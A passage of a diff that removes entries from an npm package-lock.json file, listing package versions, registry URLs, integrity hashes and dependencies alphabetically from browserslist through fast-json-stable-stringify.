"sha512-QW8HiM1shhT2GuzkvklfjcKDiWFXHOeFCIA/huJPwHsslwcydgk7X+z2zXpEijP98UCY7HbubZt5J2Zgvf0CaQ==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001587", - "electron-to-chromium": "^1.4.668", - "node-releases": "^2.0.14", - "update-browserslist-db": "^1.0.13" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001610", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001610.tgz", - "integrity": "sha512-QFutAY4NgaelojVMjY63o6XlZyORPaLfyMnsl3HgnWdJUcX6K0oaJymHjH8PT5Gk7sTm8rvC/c5COUQKXqmOMA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" - } - }, - "node_modules/ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "node_modules/cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "dependencies": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deep-is": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.3.tgz", - "integrity": "sha1-s2nW+128E+7PUk+RsHD+7cNXzzQ=", - "dev": true, - "peer": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "dependencies": { - "esutils": "^2.0.2" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "dependencies": { - "is-obj": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "dependencies": { - "jake": "^10.8.5" - }, - "bin": { - "ejs": "bin/cli.js" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.737", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.737.tgz", - "integrity": "sha512-QvLTxaLHKdy5YxvixAw/FfHq2eWLUL9KvsPjp0aHK1gI5d3EDuDgITkvj0nFO2c6zUY3ZqVAJQiBYyQP9tQpfw==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/enquirer": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", - "integrity": "sha512-yjNnPr315/FjS4zIsUxYguYUPP2e1NK4d7E7ZOLiyYCcbFBiTMyID+2wvm2w6+pZ/odMA7cRkjhsPbltwBOrLg==", - "dev": true, - "peer": true, - "dependencies": { - "ansi-colors": "^4.1.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.2.tgz", - "integrity": "sha512-ErCHMCae19vR8vQGe50xIsVomy19rg6gFu3+r3jkEO46suLMWBksvVyoGgQV+jOfl84ZSOSlmv6Gxa89PmTGmA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eslint": { - "version": "7.32.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-7.32.0.tgz", - "integrity": "sha512-VHZ8gX+EDfz+97jGcgyGCyRia/dPOd6Xh9yPv8Bl1+SoaIwD+a/vlrOmGRUyOYu7MwUhc7CxqeaDZU13S4+EpA==", - "dev": true, - "peer": true, - "dependencies": { - "@babel/code-frame": "7.12.11", - "@eslint/eslintrc": "^0.4.3", - "@humanwhocodes/config-array": "^0.5.0", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.0.1", - "doctrine": "^3.0.0", - "enquirer": "^2.3.5", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^5.1.1", - "eslint-utils": "^2.1.0", - "eslint-visitor-keys": "^2.0.0", - "espree": "^7.3.1", - "esquery": "^1.4.0", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "functional-red-black-tree": "^1.0.1", - "glob-parent": "^5.1.2", - "globals": "^13.6.0", - "ignore": "^4.0.6", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "js-yaml": "^3.13.1", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.0.4", - "natural-compare": "^1.4.0", - "optionator": "^0.9.1", - "progress": "^2.0.0", - "regexpp": "^3.1.0", - "semver": "^7.2.1", - "strip-ansi": "^6.0.0", - "strip-json-comments": "^3.1.0", - "table": "^6.0.9", - "text-table": "^0.2.0", - "v8-compile-cache": "^2.0.3" - }, - "bin": { - "eslint": "bin/eslint.js" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/eslint-scope": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", - "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", - "dev": true, - "peer": true, - "dependencies": { - "esrecurse": "^4.3.0", - "estraverse": "^4.1.1" - }, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/eslint-utils": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-2.1.0.tgz", - "integrity": "sha512-w94dQYoauyvlDc43XnGB8lU3Zt713vNChgt4EWwhXAP2XkBvndfxF0AgIqKOOasjPIPzj9JqgwkwbCYD0/V3Zg==", - "dev": true, - "peer": true, - "dependencies": { - "eslint-visitor-keys": "^1.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/mysticatea" - } - }, - "node_modules/eslint-utils/node_modules/eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/eslint-visitor-keys": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", - "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/espree": { - "version": "7.3.1", - "resolved": "https://registry.npmjs.org/espree/-/espree-7.3.1.tgz", - "integrity": "sha512-v3JCNCE64umkFpmkFGqzVKsOT0tN1Zr+ueqLZfpV1Ob8e+CEgPWa+OxCoGH3tnhimMKIaBm4m/vaRpJ/krRz2g==", - "dev": true, - "peer": true, - "dependencies": { - "acorn": "^7.4.0", - "acorn-jsx": "^5.3.1", - "eslint-visitor-keys": "^1.3.0" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/espree/node_modules/eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/esquery": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.4.0.tgz", - "integrity": "sha512-cCDispWt5vHHtwMY2YrAQ4ibFkAL8RbH5YGBnZBc90MolvvfkkQcJro/aZiAQUlQ3qgrYS6D6v8Gc5G5CQsc9w==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.1.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/esquery/node_modules/estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.2.0" - }, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esrecurse/node_modules/estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/estraverse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", - "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - 